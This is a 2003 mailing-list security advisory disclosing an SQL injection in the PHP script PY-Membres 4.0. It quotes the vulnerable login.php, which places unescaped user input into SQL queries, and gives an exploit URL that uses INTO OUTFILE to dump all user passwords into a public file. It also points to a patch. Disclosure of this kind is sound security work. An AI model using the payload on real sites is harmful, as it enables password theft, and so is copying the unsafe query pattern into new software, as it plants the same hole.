Vulnwatch mailing list archives
PY-Membres 4.0 (PHP)
From: "Frog Man" <leseulfrog () hotmail com>
Date: Sun, 06 Apr 2003 20:16:25 +0200
Informations : °°°°°°°°°°°°°° Website : http://www.py-scripts.com/ Tested version : 4.0 PHP Config : magic_quotes_gpc=OFF Problem : SQL Injection PHP Code/Location : °°°°°°°°°°°°°°°°°°° login.php : ------------------------------------------------------------------------ <? session_start(); session_name("pys"); include("config.php"); include("functions.php"); est_vide($login,"Vous n\'avez pas saisi de login !"); est_vide($pass,"Vous n\'avez pas saisi de mot de passe !"); connexiondb(); $sql = "SELECT passwd FROM $db_table WHERE login='$login'";$req = mysql_query($sql) or die('Erreur SQL !<br>'.$sql.'<br>'.mysql_error());
$data = mysql_fetch_array($req); if($data['passwd'] != $pass) { echo "<p>Mauvais login / password. Merci de recommencer</p>"; mysql_close(); exit; } else { $ploginy=$login; session_register('ploginy'); $ip=$REMOTE_ADDR; $host=gethostbyaddr($ip); $log=date("d/m/Y à H\hi | "); $log.=$ip." | ".$host;$action = mysql_query("UPDATE $db_table SET lastlog='$log' WHERE login='$ploginy'") or die (mysql_error()) ;
mysql_close(); Header("Location: membre.php"); } ?> ------------------------------------------------------------------------ Exploit : °°°°°°°°° http://[target]/login.php?login='%20OR%20ISNULL(NULL)%20INTO%20OUTFILE%20'/path/to/site/file.txt&pass=1 will save all users passwords into the file http://[target]/file.txt. Solution : °°°°°°°°°° A patch can be found on http://www.phpsecure.info. More Details In French : °°°°°°°°°°°°°°°°°°°°°°°° http://www.frog-man.org/tutos/PY-Membres4.0.txt frog-m@n _________________________________________________________________
Current thread:
- PY-Membres 4.0 (PHP) Frog Man (Apr 06)